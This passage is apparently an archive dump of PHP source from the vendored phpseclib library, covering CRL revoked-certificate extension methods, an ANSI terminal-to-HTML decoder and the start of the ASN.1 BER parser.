(($i = $this->revokedCertificate($rclist, $serial)) !== false) { return $this->removeExtensionHelper($id, "tbsCertList/revokedCertificates/$i/crlEntryExtensions"); } } return false; } /** * Get a Revoked Certificate Extension * * Returns the extension if it exists and false if not * * @param string $serial * @param string $id * @param array $crl optional * @return mixed */ public function getRevokedCertificateExtension($serial, $id, array $crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== false) { return $this->getExtension($id, $crl, "tbsCertList/revokedCertificates/$i/crlEntryExtensions"); } } return false; } /** * Returns a list of all extensions in use for a given revoked certificate * * @param string $serial * @param array $crl optional * @return array|bool */ public function getRevokedCertificateExtensions($serial, array $crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== false) { return $this->getExtensions($crl, "tbsCertList/revokedCertificates/$i/crlEntryExtensions"); } } return false; } /** * Set a Revoked Certificate Extension * * @param string $serial * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @return bool */ public function setRevokedCertificateExtension($serial, $id, $value, $critical = false, $replace = true) { if (isset($this->currentCert['tbsCertList'])) { if (is_array($rclist = &$this->subArray($this->currentCert, 'tbsCertList/revokedCertificates', true))) { if (($i = $this->revokedCertificate($rclist, $serial, true)) !== false) { return $this->setExtensionHelper($id, $value, $critical, $replace, "tbsCertList/revokedCertificates/$i/crlEntryExtensions"); } } } return false; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * @param array $mapping */ public static function registerExtension($id, array $mapping) { if (isset(self::$extensions[$id]) && self::$extensions[$id] !== $mapping) { throw new \RuntimeException( 'Extension ' . $id . ' has already been defined with a different mapping.' ); } self::$extensions[$id] = $mapping; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * * @return array|null */ public static function getRegisteredExtension($id) { return isset(self::$extensions[$id]) ? self::$extensions[$id] : null; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * @param mixed $value * @param bool $critical * @param bool $replace */ public function setExtensionValue($id, $value, $critical = false, $replace = false) { $this->extensionValues[$id] = compact('critical', 'replace', 'value'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ANSI.php000064400000047033147600400120020102 0ustar00 * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File; /** * Pure-PHP ANSI Decoder * * @author Jim Wigginton */ class ANSI { /** * Max Width * * @var int */ private $max_x; /** * Max Height * * @var int */ private $max_y; /** * Max History * * @var int */ private $max_history; /** * History * * @var array */ private $history; /** * History Attributes * * @var array */ private $history_attrs; /** * Current Column * * @var int */ private $x; /** * Current Row * * @var int */ private $y; /** * Old Column * * @var int */ private $old_x; /** * Old Row * * @var int */ private $old_y; /** * An empty attribute cell * * @var object */ private $base_attr_cell; /** * The current attribute cell * * @var object */ private $attr_cell; /** * An empty attribute row * * @var array */ private $attr_row; /** * The current screen text * * @var list */ private $screen; /** * The current screen attributes * * @var array */ private $attrs; /** * Current ANSI code * * @var string */ private $ansi; /** * Tokenization * * @var array */ private $tokenization; /** * Default Constructor. * * @return \phpseclib3\File\ANSI */ public function __construct() { $attr_cell = new \stdClass(); $attr_cell->bold = false; $attr_cell->underline = false; $attr_cell->blink = false; $attr_cell->background = 'black'; $attr_cell->foreground = 'white'; $attr_cell->reverse = false; $this->base_attr_cell = clone $attr_cell; $this->attr_cell = clone $attr_cell; $this->setHistory(200); $this->setDimensions(80, 24); } /** * Set terminal width and height * * Resets the screen as well * * @param int $x * @param int $y */ public function setDimensions($x, $y) { $this->max_x = $x - 1; $this->max_y = $y - 1; $this->x = $this->y = 0; $this->history = $this->history_attrs = []; $this->attr_row = array_fill(0, $this->max_x + 2, $this->base_attr_cell); $this->screen = array_fill(0, $this->max_y + 1, ''); $this->attrs = array_fill(0, $this->max_y + 1, $this->attr_row); $this->ansi = ''; } /** * Set the number of lines that should be logged past the terminal height * * @param int $history */ public function setHistory($history) { $this->max_history = $history; } /** * Load a string * * @param string $source */ public function loadString($source) { $this->setDimensions($this->max_x + 1, $this->max_y + 1); $this->appendString($source); } /** * Appdend a string * * @param string $source */ public function appendString($source) { $this->tokenization = ['']; for ($i = 0; $i < strlen($source); $i++) { if (strlen($this->ansi)) { $this->ansi .= $source[$i]; $chr = ord($source[$i]); // http://en.wikipedia.org/wiki/ANSI_escape_code#Sequence_elements // single character CSI's not currently supported switch (true) { case $this->ansi == "\x1B=": $this->ansi = ''; continue 2; case strlen($this->ansi) == 2 && $chr >= 64 && $chr <= 95 && $chr != ord('['): case strlen($this->ansi) > 2 && $chr >= 64 && $chr <= 126: break; default: continue 2; } $this->tokenization[] = $this->ansi; $this->tokenization[] = ''; // http://ascii-table.com/ansi-escape-sequences-vt-100.php switch ($this->ansi) { case "\x1B[H": // Move cursor to upper left corner $this->old_x = $this->x; $this->old_y = $this->y; $this->x = $this->y = 0; break; case "\x1B[J": // Clear screen from cursor down $this->history = array_merge($this->history, array_slice(array_splice($this->screen, $this->y + 1), 0, $this->old_y)); $this->screen = array_merge($this->screen, array_fill($this->y, $this->max_y, '')); $this->history_attrs = array_merge($this->history_attrs, array_slice(array_splice($this->attrs, $this->y + 1), 0, $this->old_y)); $this->attrs = array_merge($this->attrs, array_fill($this->y, $this->max_y, $this->attr_row)); if (count($this->history) == $this->max_history) { array_shift($this->history); array_shift($this->history_attrs); } // fall-through case "\x1B[K": // Clear screen from cursor right $this->screen[$this->y] = substr($this->screen[$this->y], 0, $this->x); array_splice($this->attrs[$this->y], $this->x + 1, $this->max_x - $this->x, array_fill($this->x, $this->max_x - ($this->x - 1), $this->base_attr_cell)); break; case "\x1B[2K": // Clear entire line $this->screen[$this->y] = str_repeat(' ', $this->x); $this->attrs[$this->y] = $this->attr_row; break; case "\x1B[?1h": // set cursor key to application case "\x1B[?25h": // show the cursor case "\x1B(B": // set united states g0 character set break; case "\x1BE": // Move to next line $this->newLine(); $this->x = 0; break; default: switch (true) { case preg_match('#\x1B\[(\d+)B#', $this->ansi, $match): // Move cursor down n lines $this->old_y = $this->y; $this->y += (int) $match[1]; break; case preg_match('#\x1B\[(\d+);(\d+)H#', $this->ansi, $match): // Move cursor to screen location v,h $this->old_x = $this->x; $this->old_y = $this->y; $this->x = $match[2] - 1; $this->y = (int) $match[1] - 1; break; case preg_match('#\x1B\[(\d+)C#', $this->ansi, $match): // Move cursor right n lines $this->old_x = $this->x; $this->x += $match[1]; break; case preg_match('#\x1B\[(\d+)D#', $this->ansi, $match): // Move cursor left n lines $this->old_x = $this->x; $this->x -= $match[1]; if ($this->x < 0) { $this->x = 0; } break; case preg_match('#\x1B\[(\d+);(\d+)r#', $this->ansi, $match): // Set top and bottom lines of a window break; case preg_match('#\x1B\[(\d*(?:;\d*)*)m#', $this->ansi, $match): // character attributes $attr_cell = &$this->attr_cell; $mods = explode(';', $match[1]); foreach ($mods as $mod) { switch ($mod) { case '': case '0': // Turn off character attributes $attr_cell = clone $this->base_attr_cell; break; case '1': // Turn bold mode on $attr_cell->bold = true; break; case '4': // Turn underline mode on $attr_cell->underline = true; break; case '5': // Turn blinking mode on $attr_cell->blink = true; break; case '7': // Turn reverse video on $attr_cell->reverse = !$attr_cell->reverse; $temp = $attr_cell->background; $attr_cell->background = $attr_cell->foreground; $attr_cell->foreground = $temp; break; default: // set colors //$front = $attr_cell->reverse ? &$attr_cell->background : &$attr_cell->foreground; $front = &$attr_cell->{ $attr_cell->reverse ? 'background' : 'foreground' }; //$back = $attr_cell->reverse ? &$attr_cell->foreground : &$attr_cell->background; $back = &$attr_cell->{ $attr_cell->reverse ? 'foreground' : 'background' }; switch ($mod) { // @codingStandardsIgnoreStart case '30': $front = 'black'; break; case '31': $front = 'red'; break; case '32': $front = 'green'; break; case '33': $front = 'yellow'; break; case '34': $front = 'blue'; break; case '35': $front = 'magenta'; break; case '36': $front = 'cyan'; break; case '37': $front = 'white'; break; case '40': $back = 'black'; break; case '41': $back = 'red'; break; case '42': $back = 'green'; break; case '43': $back = 'yellow'; break; case '44': $back = 'blue'; break; case '45': $back = 'magenta'; break; case '46': $back = 'cyan'; break; case '47': $back = 'white'; break; // @codingStandardsIgnoreEnd default: //user_error('Unsupported attribute: ' . $mod); $this->ansi = ''; break 2; } } } break; default: //user_error("{$this->ansi} is unsupported\r\n"); } } $this->ansi = ''; continue; } $this->tokenization[count($this->tokenization) - 1] .= $source[$i]; switch ($source[$i]) { case "\r": $this->x = 0; break; case "\n": $this->newLine(); break; case "\x08": // backspace if ($this->x) { $this->x--; $this->attrs[$this->y][$this->x] = clone $this->base_attr_cell; $this->screen[$this->y] = substr_replace( $this->screen[$this->y], $source[$i], $this->x, 1 ); } break; case "\x0F": // shift break; case "\x1B": // start ANSI escape code $this->tokenization[count($this->tokenization) - 1] = substr($this->tokenization[count($this->tokenization) - 1], 0, -1); //if (!strlen($this->tokenization[count($this->tokenization) - 1])) { // array_pop($this->tokenization); //} $this->ansi .= "\x1B"; break; default: $this->attrs[$this->y][$this->x] = clone $this->attr_cell; if ($this->x > strlen($this->screen[$this->y])) { $this->screen[$this->y] = str_repeat(' ', $this->x); } $this->screen[$this->y] = substr_replace( $this->screen[$this->y], $source[$i], $this->x, 1 ); if ($this->x > $this->max_x) { $this->x = 0; $this->newLine(); } else { $this->x++; } } } } /** * Add a new line * * Also update the $this->screen and $this->history buffers * */ private function newLine() { //if ($this->y < $this->max_y) { // $this->y++; //} while ($this->y >= $this->max_y) { $this->history = array_merge($this->history, [array_shift($this->screen)]); $this->screen[] = ''; $this->history_attrs = array_merge($this->history_attrs, [array_shift($this->attrs)]); $this->attrs[] = $this->attr_row; if (count($this->history) >= $this->max_history) { array_shift($this->history); array_shift($this->history_attrs); } $this->y--; } $this->y++; } /** * Returns the current coordinate without preformating * * @param \stdClass $last_attr * @param \stdClass $cur_attr * @param string $char * @return string */ private function processCoordinate(\stdClass $last_attr, \stdClass $cur_attr, $char) { $output = ''; if ($last_attr != $cur_attr) { $close = $open = ''; if ($last_attr->foreground != $cur_attr->foreground) { if ($cur_attr->foreground != 'white') { $open .= ''; } if ($last_attr->foreground != 'white') { $close = '' . $close; } } if ($last_attr->background != $cur_attr->background) { if ($cur_attr->background != 'black') { $open .= ''; } if ($last_attr->background != 'black') { $close = '' . $close; } } if ($last_attr->bold != $cur_attr->bold) { if ($cur_attr->bold) { $open .= ''; } else { $close = '' . $close; } } if ($last_attr->underline != $cur_attr->underline) { if ($cur_attr->underline) { $open .= ''; } else { $close = '' . $close; } } if ($last_attr->blink != $cur_attr->blink) { if ($cur_attr->blink) { $open .= ''; } else { $close = '' . $close; } } $output .= $close . $open; } $output .= htmlspecialchars($char); return $output; } /** * Returns the current screen without preformating * * @return string */ private function getScreenHelper() { $output = ''; $last_attr = $this->base_attr_cell; for ($i = 0; $i <= $this->max_y; $i++) { for ($j = 0; $j <= $this->max_x; $j++) { $cur_attr = $this->attrs[$i][$j]; $output .= $this->processCoordinate($last_attr, $cur_attr, isset($this->screen[$i][$j]) ? $this->screen[$i][$j] : ''); $last_attr = $this->attrs[$i][$j]; } $output .= "\r\n"; } $output = substr($output, 0, -2); // close any remaining open tags $output .= $this->processCoordinate($last_attr, $this->base_attr_cell, ''); return rtrim($output); } /** * Returns the current screen * * @return string */ public function getScreen() { return '
' . $this->getScreenHelper() . '
'; } /** * Returns the current screen and the x previous lines * * @return string */ public function getHistory() { $scrollback = ''; $last_attr = $this->base_attr_cell; for ($i = 0; $i < count($this->history); $i++) { for ($j = 0; $j <= $this->max_x + 1; $j++) { $cur_attr = $this->history_attrs[$i][$j]; $scrollback .= $this->processCoordinate($last_attr, $cur_attr, isset($this->history[$i][$j]) ? $this->history[$i][$j] : ''); $last_attr = $this->history_attrs[$i][$j]; } $scrollback .= "\r\n"; } $base_attr_cell = $this->base_attr_cell; $this->base_attr_cell = $last_attr; $scrollback .= $this->getScreen(); $this->base_attr_cell = $base_attr_cell; return '
' . $scrollback . '
'; } } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1.php000064400000165561147600400120020061 0ustar00 * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File; use phpseclib3\Common\Functions\Strings; use phpseclib3\File\ASN1\Element; use phpseclib3\Math\BigInteger; /** * Pure-PHP ASN.1 Parser * * @author Jim Wigginton */ abstract class ASN1 { // Tag Classes // http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=12 const CLASS_UNIVERSAL = 0; const CLASS_APPLICATION = 1; const CLASS_CONTEXT_SPECIFIC = 2; const CLASS_PRIVATE = 3; // Tag Classes // http://www.obj-sys.com/asn1tutorial/node124.html const TYPE_BOOLEAN = 1; const TYPE_INTEGER = 2; const TYPE_BIT_STRING = 3; const TYPE_OCTET_STRING = 4; const TYPE_NULL = 5; const TYPE_OBJECT_IDENTIFIER = 6; //const TYPE_OBJECT_DESCRIPTOR = 7; //const TYPE_INSTANCE_OF = 8; // EXTERNAL const TYPE_REAL = 9; const TYPE_ENUMERATED = 10; //const TYPE_EMBEDDED = 11; const TYPE_UTF8_STRING = 12; //const TYPE_RELATIVE_OID = 13; const TYPE_SEQUENCE = 16; // SEQUENCE OF const TYPE_SET = 17; // SET OF // More Tag Classes // http://www.obj-sys.com/asn1tutorial/node10.html const TYPE_NUMERIC_STRING = 18; const TYPE_PRINTABLE_STRING = 19; const TYPE_TELETEX_STRING = 20; // T61String const TYPE_VIDEOTEX_STRING = 21; const TYPE_IA5_STRING = 22; const TYPE_UTC_TIME = 23; const TYPE_GENERALIZED_TIME = 24; const TYPE_GRAPHIC_STRING = 25; const TYPE_VISIBLE_STRING = 26; // ISO646String const TYPE_GENERAL_STRING = 27; const TYPE_UNIVERSAL_STRING = 28; //const TYPE_CHARACTER_STRING = 29; const TYPE_BMP_STRING = 30; // Tag Aliases // These tags are kinda place holders for other tags. const TYPE_CHOICE = -1; const TYPE_ANY = -2; /** * ASN.1 object identifiers * * @var array * @link http://en.wikipedia.org/wiki/Object_identifier */ private static $oids = []; /** * ASN.1 object identifier reverse mapping * * @var array */ private static $reverseOIDs = []; /** * Default date format * * @var string * @link http://php.net/class.datetime */ private static $format = 'D, d M Y H:i:s O'; /** * Filters * * If the mapping type is self::TYPE_ANY what do we actually encode it as? * * @var array * @see self::encode_der() */ private static $filters; /** * Current Location of most recent ASN.1 encode process * * Useful for debug purposes * * @var array * @see self::encode_der() */ private static $location; /** * DER Encoded String * * In case we need to create ASN1\Element object's.. * * @var string * @see self::decodeDER() */ private static $encoded; /** * Type mapping table for the ANY type. * * Structured or unknown types are mapped to a \phpseclib3\File\ASN1\Element. * Unambiguous types get the direct mapping (int/real/bool). * Others are mapped as a choice, with an extra indexing level. * * @var array */ const ANY_MAP = [ self::TYPE_BOOLEAN => true, self::TYPE_INTEGER => true, self::TYPE_BIT_STRING => 'bitString', self::TYPE_OCTET_STRING => 'octetString', self::TYPE_NULL => 'null', self::TYPE_OBJECT_IDENTIFIER => 'objectIdentifier', self::TYPE_REAL => true, self::TYPE_ENUMERATED => 'enumerated', self::TYPE_UTF8_STRING => 'utf8String', self::TYPE_NUMERIC_STRING => 'numericString', self::TYPE_PRINTABLE_STRING => 'printableString', self::TYPE_TELETEX_STRING => 'teletexString', self::TYPE_VIDEOTEX_STRING => 'videotexString', self::TYPE_IA5_STRING => 'ia5String', self::TYPE_UTC_TIME => 'utcTime', self::TYPE_GENERALIZED_TIME => 'generalTime', self::TYPE_GRAPHIC_STRING => 'graphicString', self::TYPE_VISIBLE_STRING => 'visibleString', self::TYPE_GENERAL_STRING => 'generalString', self::TYPE_UNIVERSAL_STRING => 'universalString', //self::TYPE_CHARACTER_STRING => 'characterString', self::TYPE_BMP_STRING => 'bmpString' ]; /** * String type to character size mapping table. * * Non-convertable types are absent from this table. * size == 0 indicates variable length encoding. * * @var array */ const STRING_TYPE_SIZE = [ self::TYPE_UTF8_STRING => 0, self::TYPE_BMP_STRING => 2, self::TYPE_UNIVERSAL_STRING => 4, self::TYPE_PRINTABLE_STRING => 1, self::TYPE_TELETEX_STRING => 1, self::TYPE_IA5_STRING => 1, self::TYPE_VISIBLE_STRING => 1, ]; /** * Parse BER-encoding * * Serves a similar purpose to openssl's asn1parse * * @param Element|string $encoded * @return ?array */ public static function decodeBER($encoded) { if ($encoded instanceof Element) { $encoded = $encoded->element; } self::$encoded = $encoded; $decoded = self::decode_ber($encoded); if ($decoded === false) { return null; } return [$decoded]; } /** * Parse BER-encoding (Helper function) * * Sometimes we want to get the BER encoding of a particular tag. $start lets us do that without having to reencode. * $encoded is passed by reference for the recursive calls done for self::TYPE_BIT_STRING and * self::TYPE_OCTET_STRING. In those cases, the indefinite length is used. * * @param string $encoded * @param int $start * @param int $encoded_pos * @return array|bool */ private static function decode_ber($encoded, $start = 0, $encoded_pos = 0) { $current = ['start' => $start]; if (!isset($encoded[$encoded_pos])) { return false; } $type = ord($encoded[$encoded_pos++]); $startOffset = 1; $constructed = ($type >> 5) & 1; $tag = $type & 0x1F; if ($tag == 0x1F) { $tag = 0; // process septets (since the eighth bit is ignored, it's not an octet) do { if (!isset($encoded[$encoded_pos])) { return false; } $temp = ord($encoded[$encoded_pos++]); $startOffset++; $loop = $temp >> 7; $tag <<= 7; $temp &= 0x7F; // "bits 7 to 1 of the first subsequent octet shall not all be zero" if ($startOffset == 2 && $temp == 0) { return false; } $tag |= $temp; } while ($loop); } $start += $startOffset; // Length, as discussed in paragraph 8.1.3 of X.690-0207.pdf#page=13 if (!isset($encoded[$encoded_pos])) { return false; } $length = ord($encoded[$encoded_pos++]); $start++; if ($length == 0x80) { // indefinite length // "[A sender shall] use the indefinite form (see if the encoding is constructed and is not all // immediately available." -- paragraph $length = strlen($encoded) - $encoded_pos; } elseif ($length & 0x80) { // definite length, long form // technically, the long form of the length can be represented by up to 126 octets (bytes), but we'll only // support it up to four. $length &= 0x7F; $temp = substr($encoded, $encoded_pos, $length); $encoded_pos += $length; // tags of indefinte length don't really have a header length; this length includes the tag $current += ['headerlength' => $length + 2]; $start += $length; extract(unpack('Nlength', substr(str_pad($temp, 4, chr(0), STR_PAD_LEFT), -4))); /** @var integer $length */ } else { $current += ['headerlength' => 2]; } if ($length > (strlen($encoded) - $encoded_pos)) { return false; } $content = substr($encoded, $encoded_pos, $length); $content_pos = 0; // at this point $length can be overwritten. it's only accurate for definite length things as is /* Class is UNIVERSAL, APPLICATION, PRIVATE, or CONTEXT-SPECIFIC. The UNIVERSAL class is restricted to the ASN.1 built-in types. It defines an application-independent data type that must be distinguishable from all other data types. The other three classes are user defined. The APPLICATION class distinguishes data types that have a wide, scattered use within a particular presentation context. PRIVATE distinguishes data types within a particular organization or country. CONTEXT-SPECIFIC distinguishes members of a sequence or set, the alternatives of a CHOICE, or universally tagged set members. Only the class number appears in braces for this data type; the term CONTEXT-SPECIFIC does not appear. -- http://www.obj-sys.com/asn1tutorial/node12.html */ $class = ($type >> 6) & 3; switch ($class) { case self::CLASS_APPLICATION: case self::CLASS_PRIVATE: case self::CLASS_CONTEXT_SPECIFIC: if (!$constructed) { return [ 'type' => $class, 'constant' => $tag, 'content' => $content, 'length' => $length + $start - $current['start'] ] + $current; } $newcontent = []; $remainingLength = $length; while ($remainingLength > 0) { $temp = self::decode_ber($content, $start, $content_pos); if ($temp === false) { break; } $length = $temp['length']; // end-of-content octets - see paragraph 8.1.5 if (substr($content, $content_pos + $length, 2) == "\0\0") { $length += 2; $start += $length; $newcontent[] = $temp; break; } $start += $length; $remainingLength -= $length; $newcontent[] = $temp; $content_pos += $length; } return [ 'type' => $class, 'constant' => $tag, // the array encapsulation is for BC with the old format 'content' => $newcontent, // the only time when $content['headerlength'] isn't defined is when the length is indefinite. // the absence of $content['headerlength'] is how we know if something is indefinite or not. // technically, it could be defined to be 2 and then another indicator could be used but whatever. 'length' => $start - $current['start'] ] + $current; } $current += ['type' => $tag]; // decode UNIVERSAL tags switch ($tag) { case self::TYPE_BOOLEAN: // "The contents octets shall consist of a single octet." -- paragraph 8.2.1 if ($constructed || strlen($content) != 1) { return false; } $current['content'] = (bool) ord($content[$content_pos]); break; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: if ($constructed) { return false; } $current['content'] = new BigInteger(substr($content, $content_pos), -256); break; case self::TYPE_REAL: // not currently supported return false; case self::TYPE_BIT_STRING: // The initial octet shall encode, as an unsigned binary integer with bit 1 as the least significant bit, // the number of unused bits in the final subsequent octet. The number shall be in the range zero to // seven. if (!$constructed) { $current['content'] = substr($content, $content_pos); } else { $temp = self::decode_ber($content, $start, $content_pos); if ($temp === false) { return false; } $length -= (strlen($content) - $content_pos); $last = count($temp) - 1; for ($i = 0; $i < $last; $i++) { // all subtags should be bit strings if ($temp[$i]['type'] != self::TYPE_BIT_STRING) { return false; } $current['content'] .= substr($temp[$i]['content'], 1); } // all subtags should be bit strings if ($temp[$last]['type'] != self::TYPE_BIT_STRING) { return false; } $current['content'] = $temp[$last]['content'][0] . $current['content'] . substr($temp[$i]['content'], 1); } break; case self::TYPE_OCTET_STRING: if (!$constructed) { $current['content'] = substr($content, $content_pos); } else { $current['content'] = ''; $length = 0; while (substr($content, $content_pos, 2) != "\0\0") { $temp = self::decode_ber($content, $length + $start, $content_pos); if ($temp === false) { return false; } $content_pos += $temp['length']; // all subtags should be octet strings if ($temp['type'] != self::TYPE_OCTET_STRING) { return false; } $current['content'] .= $temp['content']; $length += $temp['length']; } if (substr($content, $content_pos, 2) == "\0\0") { $length += 2; // +2 for the EOC } } break; case self::TYPE_NULL: // "The contents octets shall not contain any octets." -- paragraph 8.8.2 if ($constructed || strlen($content)) { return false; } break; case self::TYPE_SEQUENCE: case self::TYPE_SET: if (!$constructed) { return false; } $offset = 0; $current['content'] = []; $content_len = strlen($content); while ($content_pos < $content_len) { // if indefinite length construction was used and we have an end-of-content string next // see paragraphs,,, 8.1.5, and (for an example) if (!isset($current['headerlength']) && substr($content, $content_pos, 2) == "\0\0") { $length = $offset + 2; // +2 for the EOC break 2; } $temp = self::decode_ber($content, $start + $offset, $content_pos); if ($temp === false) { return false; } $content_pos += $temp['length']; $current['content'][] = $temp; $offset += $temp['length']; } break; case self::TYPE_OBJECT_IDENTIFIER: if ($constructed) { return false; } $current['content'] = self::decodeOID(substr($content, $content_pos)); if ($current['content'] === false) { return false; } break; /* Each character string type shall be encoded as if it had been declared: [UNIVERSAL x] IMPLICIT OCTET STRING -- X.690-0207.pdf#page=23 (paragraph 8.21.3) Per that, we're not going to do any validation. If there are any illegal characters in the string, we don't really care */ case self::TYPE_NUMERIC_STRING: // 0,1,2,3,4,5,6,7,8,9, and space case self::TYPE_PRINTABLE_STRING: // Upper and lower case letters, digits, space, apostrophe, left/right parenthesis, plus sign, comma, // hyphen, full stop, solidus, colon, equal sign, question mark case self::TYPE_TELETEX_STRING: // The Teletex character set in CCITT's T61, space, and delete // see http://en.wikipedia.org/wiki/Teletex#Character_sets case self::TYPE_VIDEOTEX_STRING: // The Videotex character set in CCITT's T.100 and T.101, space, and delete case self::TYPE_VISIBLE_STRING: // Printing character sets of international ASCII, and space case self::TYPE_IA5_STRING: // International Alphabet 5 (International ASCII) case self::TYPE_GRAPHIC_STRING: // All registered G sets, and space case self::TYPE_GENERAL_STRING: // All registered C and G sets, space and delete case self::TYPE_UTF8_STRING: // ???? case self::TYPE_BMP_STRING: if ($constructed) { return false; } $current['content'] = substr($content, $content_pos); break; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: if ($constructed) { return false; } $current['content'] = self::decodeTime(substr($content, $content_pos), $tag); break; default: return false; } $start += $length; // ie. length is the length of the full TLV encoding - it's not just the length of the value return $current + ['length' => $start - $current['start']]; } /** * ASN.1 Map * * Provides an ASN.1 semantic mapping ($mapping) from a parsed BER-encoding to a human readable format. * * "Special" mappings may be applied on a per tag-name basis via $special. * * @param array $decoded * @param array $mapping * @param array $special * @return array|bool|Element|string|null */ public static function asn1map(array $decoded, $mapping, $special = []) { if (isset($mapping['explicit']) && is_array($decoded['content'])) { $decoded = $decoded['content'][0]; } switch (true) { case $mapping['type'] == self::TYPE_ANY: $intype = $decoded['type']; // !isset(self::ANY_MAP[$intype]) produces a fatal error on PHP 5.6 if (isset($decoded['constant']) || !array_key_exists($intype, self::ANY_MAP) || (ord(self::$encoded[$decoded['start']]) & 0x20)) { return new Element(substr(self::$encoded, $decoded['start'], $decoded['length'])); } $inmap = self::ANY_MAP[$intype]; if (is_string($inmap)) { return [$inmap => self::asn1map($decoded, ['type' => $intype] + $mapping, $special)]; } break; case $mapping['type'] == self::TYPE_CHOICE: foreach ($mapping['children'] as $key => $option) { switch (true) { case isset($option['constant']) && $option['constant'] == $decoded['constant']: case !isset($option['constant']) && $option['type'] == $decoded['type']: $value = self::asn1map($decoded, $option, $special); break; case !isset($option['constant']) && $option['type'] == self::TYPE_CHOICE: $v = self::asn1map($decoded, $option, $special); if (isset($v)) { $value = $v; } } if (isset($value)) { if (isset($special[$key])) { $value = $special[$key]($value); } return [$key => $value]; } } return null; case isset($mapping['implicit']): case isset($mapping['explicit']): case $decoded['type'] == $mapping['type']: break; default: // if $decoded['type'] and $mapping['type'] are both strings, but different types of strings, // let it through switch (true) { case $decoded['type'] < 18: // self::TYPE_NUMERIC_STRING == 18 case $decoded['type'] > 30: // self::TYPE_BMP_STRING == 30 case $mapping['type'] < 18: case $mapping['type'] > 30: return null; } } if (isset($mapping['implicit'])) { $decoded['type'] = $mapping['type']; } switch ($decoded['type']) { case self::TYPE_SEQUENCE: $map = []; // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $child = $mapping['children']; foreach ($decoded['content'] as $content) { if (($map[] = self::asn1map($content, $child, $special)) === null) { return null; } } return $map; } $n = count($decoded['content']); $i = 0; foreach ($mapping['children'] as $key => $child) { $maymatch = $i < $n; // Match only existing input. if ($maymatch) { $temp = $decoded['content'][$i]; if ($child['type'] != self::TYPE_CHOICE) { // Get the mapping and input class & constant. $childClass = $tempClass = self::CLASS_UNIVERSAL; $constant = null; if (isset($temp['constant'])) { $tempClass = $temp['type']; } if (isset($child['class'])) { $childClass = $child['class']; $constant = $child['cast']; } elseif (isset($child['constant'])) { $childClass = self::CLASS_CONTEXT_SPECIFIC; $constant = $child['constant']; } if (isset($constant) && isset($temp['constant'])) { // Can only match if constants and class match. $maymatch = $constant == $temp['constant'] && $childClass == $tempClass; } else { // Can only match if no constant expected and type matches or is generic. $maymatch = !isset($child['constant']) && array_search($child['type'], [$temp['type'], self::TYPE_ANY, self::TYPE_CHOICE]) !== false; } } } if ($maymatch) { // Attempt submapping. $candidate = self::asn1map($temp, $child, $special); $maymatch = $candidate !== null; } if ($maymatch) { // Got the match: use it. if (isset($special[$key])) { $candidate = $special[$key]($candidate); } $map[$key] = $candidate; $i++; } elseif (isset($child['default'])) { $map[$key] = $child['default']; } elseif (!isset($child['optional'])) { return null; // Syntax error. } } // Fail mapping if all input items have not been consumed. return $i < $n ? null : $map; // the main diff between sets and sequences is the encapsulation of the foreach in another for loop case self::TYPE_SET: $map = []; // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $child = $mapping['children']; foreach ($decoded['content'] as $content) { if (($map[] = self::asn1map($content, $child, $special)) === null) { return null; } } return $map; } for ($i = 0; $i < count($decoded['content']); $i++) { $temp = $decoded['content'][$i]; $tempClass = self::CLASS_UNIVERSAL; if (isset($temp['constant'])) { $tempClass = $temp['type']; } foreach ($mapping['children'] as $key => $child) { if (isset($map[$key])) { continue; } $maymatch = true; if ($child['type'] != self::TYPE_CHOICE) { $childClass = self::CLASS_UNIVERSAL; $constant = null; if (isset($child['class'])) { $childClass = $child['class']; $constant = $child['cast']; } elseif (isset($child['constant'])) { $childClass = self::CLASS_CONTEXT_SPECIFIC; $constant = $child['constant']; } if (isset($constant) && isset($temp['constant'])) { // Can only match if constants and class match. $maymatch = $constant == $temp['constant'] && $childClass == $tempClass; } else { // Can only match if no constant expected and type matches or is generic. $maymatch = !isset($child['constant']) && array_search($child['type'], [$temp['type'], self::TYPE_ANY, self::TYPE_CHOICE]) !== false; } } if ($maymatch) { // Attempt submapping. $candidate = self::asn1map($temp, $child, $special); $maymatch = $candidate !== null; } if (!$maymatch) { break; } // Got the match: use it. if (isset($special[$key])) { $candidate = $special[$key]($candidate); } $map[$key] = $candidate; break; } } foreach ($mapping['children'] as $key => $child) { if (!isset($map[$key])) { if (isset($child['default'])) { $map[$key] = $child['default']; } elseif (!isset($child['optional'])) { return null; } } } return $map; case self::TYPE_OBJECT_IDENTIFIER: return isset(self::$oids[$decoded['content']]) ? self::$oids[$decoded['content']] : $decoded['content']; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: // for explicitly tagged optional stuff if (is_array($decoded['content'])) { $decoded['content'] = $decoded['content'][0]['content']; } // for implicitly tagged optional stuff // in theory, doing isset($mapping['implicit']) would work but malformed certs do exist // in the wild that OpenSSL decodes without issue so we'll support them as well if (!is_object($decoded['content'])) { $decoded['content'] = self::decodeTime($decoded['content'], $decoded['type']); } return $decoded['content'] ? $decoded['content']->format(self::$format) : false; case self::TYPE_BIT_STRING: if (isset($mapping['mapping'])) { $offset = ord($decoded['content'][0]); $size = (strlen($decoded['content']) - 1) * 8 - $offset; /* From X.680-0207.pdf#page=46 (21.7): "When a "NamedBitList" is used in defining a bitstring type ASN.1 encoding rules are free to add (or remove) arbitrarily any trailing 0 bits to (or from) values that are being encoded or decoded. 